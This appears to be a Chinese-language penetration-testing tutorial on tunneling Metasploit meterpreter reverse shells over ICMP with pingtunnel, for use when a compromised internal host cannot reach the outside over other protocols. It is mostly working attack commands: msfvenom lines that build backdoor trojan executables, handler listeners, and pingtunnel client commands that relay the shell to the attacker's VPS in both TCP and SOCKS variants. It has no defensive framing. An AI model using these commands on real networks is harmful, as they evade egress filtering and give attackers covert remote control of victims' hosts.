后臺私信找我獲取工具?
目錄
ICMP隧道作用
ICMP隧道轉發TCP上線MSF
開啟服務端
生成后門木馬?
msf開啟監聽?
?開啟客戶端icmp隧道
執行后門木馬,本地上線?
ICMP隧道轉發SOCKS上線MSF?
開啟服務端
生成后門木馬
msf開啟監聽??
?開啟客戶端icmp隧道?
?執行后門木馬,本地上線?
ICMP隧道作用
通過某種信道獲取了內網主機的shell,但是當前信道不適合做遠控的通信信道,TCP和UDP等傳輸層協議不能出網,DNS、HTTP等應用層協議也不能出網,只有ICMP協議可以出網。
ICMP隧道轉發TCP上線MSF
開啟服務端
./pingtunnel -type server
生成后門木馬?
注意:該木馬監聽的是本地
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f exe > 9999.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f exe -o 9999.exe
msf開啟監聽?
handler -p windows/x64/meterpreter/reverse_tcp -H 0.0.0.0 -P 9999 #監控全段的ip
或
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.20.128 -P 9999 #192.168.20.128自己的vps的ip
?開啟客戶端icmp隧道
pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.20.128 -t 192.168.20.128:9999 -tcp 1 -noprint 1 -nolog 1
執行后門木馬,本地上線?
ICMP隧道轉發SOCKS上線MSF?
開啟服務端
生成后門木馬
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.128 lport=8888 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe > 8888.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.128 lport=8888 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe -o 8888.exe
msf開啟監聽??
handler -p windows/x64/meterpreter/reverse_tcp -H 0.0.0.0 -P 8888 #監控全段的ip
或
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.20.128 -P 8888 #192.168.20.128自己的vps的ip
?開啟客戶端icmp隧道?
pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.20.128 -sock5 1 -noprint 1 -nolog 1
?執行后門木馬,本地上線?
?